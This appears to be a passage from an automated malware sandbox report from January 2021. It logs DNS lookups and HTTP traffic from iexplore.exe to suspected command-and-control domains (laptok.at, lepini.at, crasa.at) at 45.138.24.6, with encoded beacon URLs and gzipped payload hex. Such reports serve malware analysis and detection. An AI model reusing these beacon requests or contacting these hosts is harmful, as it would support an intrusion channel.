                                                                                                                                    Jan 22, 2021 19:10:13.641551018 CET53593298.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:14.269465923 CET6402153192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:14.317548990 CET53640218.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:20.785418034 CET5612953192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:20.843497992 CET53561298.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:22.232099056 CET5817753192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:22.599684000 CET53581778.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:29.235496998 CET5070053192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:29.291783094 CET53507008.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:37.045063972 CET5406953192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:37.104337931 CET53540698.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:50.779829979 CET6117853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:50.871721029 CET53611788.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:51.551151991 CET5701753192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:51.608982086 CET53570178.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:51.780750036 CET6117853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:51.828468084 CET53611788.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:52.798974037 CET6117853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:52.855051994 CET53611788.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:53.133249998 CET5632753192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:53.181328058 CET53563278.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:54.813378096 CET6117853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:54.861331940 CET53611788.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:10:58.828033924 CET6117853192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:10:58.884644985 CET53611788.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:11:15.392291069 CET5024353192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:11:15.722639084 CET53502438.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:11:21.534920931 CET6205553192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:11:21.582855940 CET53620558.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:11:21.793004990 CET6124953192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:11:21.843645096 CET53612498.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:11:22.083172083 CET6525253192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:11:22.147133112 CET53652528.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:11:23.422338009 CET6436753192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:11:23.481559992 CET53643678.8.8.8192.168.2.6
                                                                                                                                    Jan 22, 2021 19:11:26.863801956 CET5506653192.168.2.68.8.8.8
                                                                                                                                    Jan 22, 2021 19:11:27.067749023 CET53550668.8.8.8192.168.2.6

                                                                                                                                    DNS Queries

                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                                    Jan 22, 2021 19:10:22.232099056 CET192.168.2.68.8.8.80xc9c5Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:10:29.235496998 CET192.168.2.68.8.8.80xbdd4Standard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:10:37.045063972 CET192.168.2.68.8.8.80x172bStandard query (0)api10.laptok.atA (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:15.392291069 CET192.168.2.68.8.8.80x55c5Standard query (0)c56.lepini.atA (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:21.793004990 CET192.168.2.68.8.8.80xd54fStandard query (0)resolver1.opendns.comA (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:23.422338009 CET192.168.2.68.8.8.80x1ff8Standard query (0)api3.lepini.atA (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:26.863801956 CET192.168.2.68.8.8.80x96e9Standard query (0)app.crasa.atA (IP address)IN (0x0001)

                                                                                                                                    DNS Answers

                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                                    Jan 22, 2021 19:10:22.599684000 CET8.8.8.8192.168.2.60xc9c5No error (0)api10.laptok.at45.138.24.6A (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:10:29.291783094 CET8.8.8.8192.168.2.60xbdd4No error (0)api10.laptok.at45.138.24.6A (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:10:37.104337931 CET8.8.8.8192.168.2.60x172bNo error (0)api10.laptok.at45.138.24.6A (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:15.722639084 CET8.8.8.8192.168.2.60x55c5No error (0)c56.lepini.at45.138.24.6A (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:21.843645096 CET8.8.8.8192.168.2.60xd54fNo error (0)resolver1.opendns.com208.67.222.222A (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:23.481559992 CET8.8.8.8192.168.2.60x1ff8No error (0)api3.lepini.at45.138.24.6A (IP address)IN (0x0001)
                                                                                                                                    Jan 22, 2021 19:11:27.067749023 CET8.8.8.8192.168.2.60x96e9No error (0)app.crasa.at128.14.142.220A (IP address)IN (0x0001)

                                                                                                                                    HTTP Request Dependency Graph

                                                                                                                                    • api10.laptok.at
                                                                                                                                    • c56.lepini.at
                                                                                                                                    • api3.lepini.at
                                                                                                                                    • app.crasa.at

                                                                                                                                    HTTP Packets

                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    0192.168.2.64974445.138.24.680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:10:22.667568922 CET4471OUTGET /api1/qvYtom7jPMjc/BwFvjaIO4Bv/MbiT4yG6pHfZnV/ZL7sBbHjAqjjVKuOVsR_2/BwLLpnqz5A7VsJpR/VO84dIDbsiOR8iF/cYWxYBw9oC1caEXJgQ/1ZZhS32tE/_2FIQD8vf0Ka7hthdepE/X6LzVrz2dY0Kt9O92Fg/RdwscE4szAaD7AwXR4Vb_2/BkqnQ_2BhW_2F/lBJqoDb5/VV0dcjLelYqerhB5eYzjTAM/cUE3isCvij/iDKviq_2BgRZp2DXp/gw7kl8fvts1f/V1i5c7M51yH/1feNv9xtSWcKia/RzrYlQJt9o9X3mmLIReIH/gGWW8 HTTP/1.1
                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                    Accept-Language: en-US
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: api10.laptok.at
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Jan 22, 2021 19:10:23.335072041 CET4480INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Fri, 22 Jan 2021 18:10:23 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 1c 9a c5 72 eb 40 14 05 3f c8 0b 31 2d 25 59 cc 0c 3b 31 33 eb eb 9f f3 96 49 55 54 d6 cc bd e7 74 bb 92 e2 f1 64 55 d2 24 2c 72 76 a2 1b 4c d1 ce b8 72 2a 7c d7 35 c3 f7 0a 3f b5 58 11 ea 49 2a a5 52 7d 1e 0c 5d 9b 7d 4d 22 47 7a 4d 4d 60 27 d9 ce e3 20 22 85 dd de a1 9b eb fb 63 2b 37 4e 83 f6 dd cc eb 42 1e 65 f1 cb be 52 4e 6c 73 20 dd b3 3e b4 00 1a 1f b0 d2 35 29 9f f3 24 75 9a 42 c2 39 33 05 67 64 0b ed 47 96 92 eb 97 1e 6e b7 13 b1 dd 52 67 67 62 58 ad 98 b4 c5 a0 07 6b 53 d9 67 9c 29 87 dd 85 a2 38 4e 76 cb ec 9e 8c c0 a8 45 99 d6 06 24 c7 44 6a 13 6e 27 b1 de bc a4 11 ce 21 56 31 5f 8f 9f 6f bd c5 d1 f2 6a 10 d0 cf ca aa 5a 4b c3 65 f2 98 c9 c2 9a 34 47 25 64 f4 3a 6a df e0 5a d4 ac 82 31 bc 39 74 c2 3e bd d6 0f 7b 7b 62 bf 60 01 35 c9 98 1d 9d 8d 65 2e d0 b5 87 34 41 65 48 ac ce 2e ed 5d a4 8c c6 3d 56 6f 5d ed 79 3c ca 1e af dd 9b 10 03 03 bc a6 95 50 1c a1 8b 14 21 62 96 fa d4 3b 1d 31 bf c1 55 74 0c d9 a5 fc 69 33 ca 74 07 95 53 02 c7 06 0a 70 f6 bc 0e 3a cb 79 95 b6 77 73 89 7d b1 30 06 29 d6 df 0a 71 86 c6 b6 2c 38 74 04 d2 88 68 a6 8a 68 3c 5f 29 41 0a f7 51 11 e8 4e 36 4d 3e 39 63 8d ff f8 4c 0d a8 bc 56 58 80 e2 7c 78 7d 78 36 dd 66 04 1d 10 da a8 81 79 49 98 5e 0c f6 b2 ee e3 e7 98 01 7d 21 0b df a8 ef ce 69 1e eb be 74 e4 2b 8d fb 21 40 7a c1 78 f0 c1 5f 14 39 2a d7 be 6e 86 6b da 88 c5 22 79 cd ca 80 6f b8 d6 00 1a 41 ab 21 69 b3 ce 41 5b e1 26 05 a1 8f 7e 34 0f 01 a6 0a be 67 7c 85 cc 9b 85 ae 9a 57 f9 38 4b 21 cc 06 df 6c 05 6c 6c 01 23 7a 4e 65 9c 61 3b b8 83 20 44 9d ed 0b e1 98 6f 8a 5e f6 88 7c 0c 7d 20 c7 71 3d 09 93 a3 c8 e0 51 81 99 43 0c de 46 f0 23 fa 4d 06 a0 23 84 14 75 75 43 5d 5a ed ca 98 f0 25 14 ed 12 fc 2a 14 14 80 a2 49 45 2e f9 0b e2 4f 4e 6a f6 0f a7 f0 99 26 1f 55 0e 39 05 6d 0d 27 58 28 7b 57 21 4d 1b 8b e0 19 79 22 52 1f 91 1c 58 4d 5e 3e ce 02 c1 dc ed 98 1d 9c 39 f1 12 5f 89 68 6f 39 5c 1c 31 83 6b e5 16 cc dd 17 68 2e 17 88 2e 61 10 9e ef 23 48 af 65 7c 38 d6 c7 13 16 43 1b d4 0e a6 ef 71 e8 4a 12 14 a1 b6 d5 02 28 8b dc a8 d5 62 87 4b e7 0d c7 d8 48 13 a1 6f 76 25 a4 41 f4 cb 7c cd 3d ca f8 50 a8 f0 95 a8 3c ac cb 3e f5 dc 1a da ab a6 d2 17 11 98 c2 78 0a b0 2e ac ab 98 fd 35 91 cb 38 cc b2 43 70 12 61 53 14 ac f0 d3 da 7e 0b 7c 77 fd 11 46 96 d9 42 df ad 1b 66 31 50 73 c4 1f eb 2a d8 d5 8a e3 c4 10 7b 65 26 ab a2 a7 71 1f 76 1d 24 5f ec 56 a6 68 a9 04 4d 2e a0 fe 2a 31 09 f0 2b 49 3d 90 23 0c c6 6f 98 3a 02 a8 38 e3 dc c9 ae 4d 86 f5 ac 6e 4f 6e bf c0 f7 35 0b 89 81 68 4d ff 6a dc d2 37 a0 cd b2 4b 1d bf 29 92 d2 10 f9 65 17 b2 b2 9e 8d 28 d0 2b 60 ef 01 cc df 04 cb 8b 06 d1 6b bc aa 6f 5c b2 b3 aa 76 13 3d 3f 99 fd 4d e1 1d fb 1d 5b 5e 47 41 63 a1 db 18 f0 8a 24 68 00 ca 1e a2 67 19 d5 0d b1 6d f7 6c fc 7d 98 d4 e2 5f b9 81 a8 80 00 b5 97 16 94 13 44 23 e9 79 cc d9 fb e4 57 9d 13 de dc c1 5f 09 e8 ac af 52 2d ea 53 3e 60 b0 1e ef 43 4f 4c 92 d7 a7 0a 2c d3 5b 73 26 e3 a9 8d 8b 9e 97 97 93 aa 03 83 ee 19 84 8d 41 b5 37 72 8a b5 6f 9d 07 29 18 8c 24 3a 8e 6e 9c b0 c0 85 1f 7b be 02 45 69 ea 52 3d aa f4 63 17 7b 64 19 c3 0e 59 69 00 e3 2f f2 c2 4d e6 bf 5e
                                                                                                                                    Data Ascii: 2000r@?1-%Y;13IUTtdU$,rvLr*|5?XI*R}]}M"GzMM`' "c+7NBeRNls >5)$uB93gdGnRggbXkSg)8NvE$Djn'!V1_ojZKe4G%d:jZ19t>{{b`5e.4AeH.]=Vo]y<P!b;1Uti3tSp:yws}0)q,8thh<_)AQN6M>9cLVX|x}x6fyI^}!it+!@zx_9*nk"yoA!iA[&~4g|W8K!lll#zNea; Do^|} q=QCF#M#uuC]Z%*IE.ONj&U9m'X({W!My"RXM^>9_ho9\1kh..a#He|8CqJ(bKHov%A|=P<>x.58CpaS~|wFBf1Ps*{e&qv$_VhM.*1+I=#o:8MnOn5hMj7K)e(+`ko\v=?M[^GAc$hgml}_D#yW_R-S>`COL,[s&A7ro)$:n{EiR=c{dYi/M^


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    1192.168.2.64974545.138.24.680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:10:27.414027929 CET4747OUTGET /favicon.ico HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Host: api10.laptok.at
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Jan 22, 2021 19:10:27.527513981 CET4748INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Fri, 22 Jan 2021 18:10:27 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    2192.168.2.64974645.138.24.680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:10:29.357069969 CET4749OUTGET /api1/e8J0mG5lwiTYI4icST/XwuRPk1WR/O2_2FLREL3g_2Bdsncic/_2F_2Fow8TpCB9p_2Bj/zmvfM_2BxkF2z6LAdGBQYT/VVFUBTjiLtdmv/z1vsS1b9/h_2Fj_2BxFVp8DBu2Dofcsv/Kv6seO5eeW/D_2BeLNZQPv2reEOP/gDxjD6y_2Ba9/4irkQZqxmvf/9gg2SCAj4TalZx/1SLIP2InPcQLc5ZsM9f5y/_2FMOWQ6jsIMXMBN/hDufArlyeEDIAOr/Sco7UD5GaVWTjyRv0y/uryOt5Vso/0DF8H9bz3K9Q8xTOA2GN/nbXSkM052l7YJ25GJNP/F1evg5adcZfk_2FVPUzqLE/34tuFQrR HTTP/1.1
                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                    Accept-Language: en-US
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: api10.laptok.at
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Jan 22, 2021 19:10:29.966078043 CET4759INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Fri, 22 Jan 2021 18:10:29 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Data Raw: 32 30 30 30 0d 0a 1f 8b 08 00 00 00 00 00 00 03 14 9b c5 ae a4 00 14 05 3f 88 05 6e 4b dc 9d c6 76 b8 bb f3 f5 f3 86 f4 b2 13 e4 ca a9 4a 40 5d 9b 1b 51 d2 4b a6 ea a4 6f 96 5c dc 6e d8 d2 55 36 fd a1 6a f7 e9 45 cb c0 ae c4 2b 6e cc d7 3f 88 8c b9 ce 3e 53 16 cc 1e 7f 63 f7 2e 6a 50 cf f5 d7 32 2c 77 68 d8 e3 12 78 4a 9f 4b e6 f2 ae 1c 4f f1 0b 65 92 4e ce 7b 39 80 35 a8 f6 13 61 7a 6a 97 8d bd f9 f1 58 69 7e 59 31 f4 5e 2d 7c f4 f1 db 0b ab 24 a8 1b 1a bc ac ee 38 fb 92 44 44 34 42 5e ca 36 85 bd 99 7e 89 37 05 72 f4 0c 6c 98 7b 36 4e d7 1e 23 58 ad d6 c1 a5 62 a7 76 21 8e b4 df 7c 6e 38 d8 90 89 c6 c0 24 7a 9b ba 64 ec 4e bb d5 4d 9f 25 5b 59 3e 9b ec 30 ae 24 71 04 b8 5b 61 8a cc 3a 34 f0 83 dd 6e 4a 76 c3 9c e6 75 24 73 24 f9 28 16 e2 6b c0 5c c5 5a 4a cf 30 a4 03 63 f8 3d f9 51 53 9b 35 40 da 3d 26 fd f5 75 85 02 a0 e5 09 40 5d bd 56 87 45 74 81 bd b3 33 7f 3f d2 af bb 0f 74 ae 56 bc 2c 4b 30 02 56 0c d6 6e 99 4e ab 90 3b a0 11 e2 da 62 8e 2f 45 52 c4 da 90 aa 26 9e 5a d7 33 6b 4f ad 68 24 4f 70 5c d3 56 18 af 2c 92 2b ce c5 60 61 a5 6c a3 fc 57 da 28 7d 0d e4 35 c0 29 76 39 46 09 d6 bc 53 24 73 92 b7 74 93 f1 61 bb 30 a7 a4 89 cf 83 6e f1 c3 94 0b d5 ac c1 10 00 da 8f ad 26 34 0a 35 b7 8a f2 1d b4 a1 3a 09 75 d1 99 55 3a 6d 40 df 60 65 eb 0d 22 12 02 7b f9 42 e9 96 69 a5 1a 43 ce 42 8e c8 a3 dc 6a 6f 6c 2b 11 5b 3c 07 d5 25 ef 9e da 30 9b 49 2a e0 52 d2 f2 7d 25 97 16 6e 25 12 b3 93 48 1c fe e5 8a f7 e4 e1 26 05 49 4c 88 dc 11 54 a1 bf 56 89 9d 9d c9 cf 92 03 c8 1d fd fa 7d aa 6d e2 79 d1 af ed e3 0d cf 8f 09 35 3a 5d ed 60 8d 00 89 7f a7 7e 1c 65 df f2 a9 ad a5 d9 66 ad b8 7d 17 72 54 2d 5f cb 7c 5f 5a 21 dc cb 3f 62 77 f6 39 aa 2c c3 9f 74 fe b0 cc 0d 45 08 d5 ed 5f 0e de e0 71 38 b5 b8 dc 35 22 5c bd eb a6 fa 72 82 01 62 13 76 ab ef ae b5 4b 39 5f 1b bb 29 03 7c 8e c8 cb cf c8 24 fd c8 18 1c e8 d0 83 16 c6 7b d9 b3 48 8a 79 d4 50 d9 d1 cd a2 a3 f7 8a f9 60 38 7a 41 60 1a 9f 59 4d 61 65 d1 52 b3 5a 51 16 1e 2d 13 c1 c3 e5 56 8a cd a2 70 85 1f fb 3e f5 67 3a 02 e3 67 88 1c 31 e2 f2 42 b9 55 b3 29 66 77 d3 7a 38 1d 5c d0 9d 77 7e ef d5 26 06 f4 96 e2 a5 87 be 2d 7b dd 77 e3 ca b7 a1 97 cc bd 30 ac 2f d3 6b 7c ce e8 ea d9 ab ed 02 39 e0 da fa 74 8d bb 94 b4 e5 00 aa c2 84 bb 28 ce 71 1d f7 81 e0 13 bc 37 bb 23 15 85 6b 9f 0d b1 3f f4 2f 3e c0 20 5c cd 02 16 e6 a1 33 5a 07 d0 fc 42 49 67 62 34 f3 eb a7 80 01 df d1 b5 98 fa d9 9d 52 a8 54 d2 87 5e 7f e4 72 fb bd 01 5a 1b cf 75 e7 5c b2 00 75 2c 74 f4 be 5b fd 9e f9 7c dc 83 0f 19 8d 3f 5a cd 9e 3a c7 a1 7a 7a bf 13 e1 28 cd 8c df 36 74 31 b9 a3 bf ea 4d 00 d6 4c ef 53 6d 01 27 30 ca 6b 7e e8 9a 59 ce 57 76 b3 ce 47 70 54 dd bb 4b d5 ee 3e c7 97 a2 39 80 b6 30 55 cd a3 7f 67 74 5e 0a d9 54 21 9b 63 40 f2 d7 01 f9 55 61 f3 80 7c e5 aa 7b b5 d4 97 b9 94 48 48 71 dc c8 01 e5 a9 6f 76 62 e8 47 75 5b 0b 6e 6a d7 3a 04 d6 f0 fe c1 91 58 42 a2 26 35 db 7a 94 bc 31 08 14 8e 80 73 0b c1 5a 0f 37 c5 c5 4f 44 1c dd 56 69 7e 64 fb 21 2e 4f 3d 2a 8e 70 73 ca d4 50 76 3d 04 c6 d1 4a e1 63 5e 7e ff 62 f1 d2 fe fa 8f 56 49 f5 be 44 52 c1 62 36 e8 59 f4 9c 37 b7 eb 65 02 15 9d c9 ef ae 5f 72 0e d7 66 89 1d 4a 4b 71
                                                                                                                                    Data Ascii: 2000?nKvJ@]QKo\nU6jE+n?>Sc.jP2,whxJKOeN{95azjXi~Y1^-|$8DD4B^6~7rl{6N#Xbv!|n8$zdNM%[Y>0$q[a:4nJvu$s$(k\ZJ0c=QS5@=&u@]VEt3?tV,K0VnN;b/ER&Z3kOh$Op\V,+`alW(}5)v9FS$sta0n&45:uU:m@`e"{BiCBjol+[<%0I*R}%n%H&ILTV}my5:]`~ef}rT-_|_Z!?bw9,tE_q85"\rbvK9_)|${HyP`8zA`YMaeRZQ-Vp>g:g1BU)fwz8\w~&-{w0/k|9t(q7#k?/> \3ZBIgb4RT^rZu\u,t[|?Z:zz(6t1MLSm'0k~YWvGpTK>90Ugt^T!c@Ua|{HHqovbGu[nj:XB&5z1sZ7ODVi~d!.O=*psPv=Jc^~bVIDRb6Y7e_rfJKq


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    3192.168.2.64974745.138.24.680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:10:35.147151947 CET5071OUTGET /favicon.ico HTTP/1.1
                                                                                                                                    Accept: */*
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Host: api10.laptok.at
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Jan 22, 2021 19:10:35.267900944 CET5071INHTTP/1.1 404 Not Found
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Fri, 22 Jan 2021 18:10:35 GMT
                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Data Raw: 36 61 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 82 e8 e4 d4 bc 92 d4 22 3b 9b 0c 43 74 1d 40 11 1b 7d a8 34 c8 6c a0 22 28 2f 2f 3d 33 af 02 59 4e 1f 66 9a 3e d4 25 00 0b d9 61 33 92 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 6a(HML),I310Q/Qp/K&T";Ct@}4l"(//=3YNf>%a30


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    4192.168.2.64974845.138.24.680C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    Jan 22, 2021 19:10:37.178920031 CET5072OUTGET /api1/ON6JKCj_2BzCCDB/1zRXWjmGSH4dnXto7n/a3jbKUyFp/zm28mIKXIZXvZ9zAbzLK/ylKE7k3_2BbdPjjCSjH/Bhzm2iLbw_2BlZFjfzdu9K/QNeuz5NJoJPdd/3RpNk4gX/684IFalzbokAf38NKCQoGB3/giv4u8aUar/1Y3IwJEGTTwG7vgZb/hfQjMo3huzsc/_2B2kxzS9SV/aDAgJWuWGRyIv3/OVgklOZtJCDxn5mV_2BOp/ZWvDrGcJhzM9JQCv/ytbaFIu03cT7HsQ/LvD4iOQPI8imqvRWlT/lJ9Iessga/osAc16h46CUOpOSEj/Yy HTTP/1.1
                                                                                                                                    Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                    Accept-Language: en-US
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                    Host: api10.laptok.at
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Jan 22, 2021 19:10:37.569427013 CET5074INHTTP/1.1 200 OK
                                                                                                                                    Server: nginx
                                                                                                                                    Date: Fri, 22 Jan 2021 18:10:37 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: close
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    Strict-Transport-Security: max-age=63072000; includeSubdomains
                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                    Content-Encoding: gzip
                                                                                                                                    Data Raw: 37 36 32 0d 0a 1f 8b 08 00 00 00 00 00 00 03 15 94 b5 b6 ed 08 0c 43 3f 28 45 98 8a 57 84 99 73 42 5d 98 99 f3 f5 73 a7 71 a3 c2 4b b2 b5 d5 52 02 a9 db 6f de 81 13 26 0c e0 94 1f 94 7b 07 90 a2 99 50 8f e7 97 dd 0a be 7a ee 60 38 3a 2e 69 79 b2 76 dc da e7 d9 9c 19 8d 2c f7 bb 89 f1 99 36 29 2d 16 3d fd 95 35 9e 2c 7f 0a 7d ed f1 36 7e 9f 8e 63 5a f4 9a 68 80 87 9d 8c 9f be 38 d5 bb 91 4d 58 0d 03 b9 3c fa 9b e7 f1 ca 73 17 86 ce 00 ef 43 4a 3f e5 97 e5 b1 23 76 69 57 18 02 bb e1 40 70 02 a6 c7 4e f7 60 89 e3 b6 01 42 0a 19 84 ee 24 a0 89 d1 03 49 15 a8 e4 21 70 ad b8 bc d1 66 91 c9 69 c0 60 2b ba ed f9 28 b3 3b 64 98 ac c4 53 d4 5a 3a 1a b0 9a ce 0b 85 da 6c 85 37 08 5f 93 a6 39 d9 c9 40 29 44 0b 31 90 19 94 8d 16 8f f4 66 89 b1 94 1d 84 bf 44 86 d4 32 53 bd 19 20 38 0c 8a 67 89 ed b2 e7 e8 50 a0 29 c8 7d ca 6e 76 11 4b 9a bf a0 15 3e a7 08 6a d4 0f e0 79 05 7b 6c e2 65 83 52 79 b5 91 13 b4 66 ec 67 a1 1a 0c 83 c3 df 16 b6 e9 5c 95 a5 68 32 27 b0 14 3f d3 21 00 4a de fa 4e f4 c6 b8 fb 68 d4 43 bb 32 f3 fa 47 8b a5 69 54 c6 e7 6f 41 9e 0d 71 b8 f2 1a fb 3a 45 1e 61 78 68 73 ae c1 09 c2 84 3f e4 dd bf 15 a6 fa 2c 85 d3 93 51 93 a5 6a 0f 50 47 84 fa 6b 26 cd 51 44 aa 40 68 8c 20 54 8c 34 a3 65 67 d8 b2 58 b2 63 e6 e7 4b de 9b bc 89 c4 ea 69 c7 33 95 b4 00 1a 84 1d 93 ad d5 af 0b 82 8b a6 4c 3a b4 38 d5 64 b7 89 3d 08 92 de 9d 74 b0 ba 18 01 1d c7 0b e2 f3 04 ae 2f 5a a4 15 a2 e0 ca ca 26 f4 e7 2e 83 96 ce 86 3a 04 fc a2 2c 22 0f 53 56 3f 4e bd 8c 60 0a 57 00 6c 4f e8 08 19 94 51 c6 8a 97 9d 6a fd ee 73 91 15 24 0d 63 68 6b b2 ab d0 a2 09 a4 60 36 d7 4b e1 65 0e 57 6b ff 53 a6 59 47 04 32 d8 f8 db de 6c 9a 13 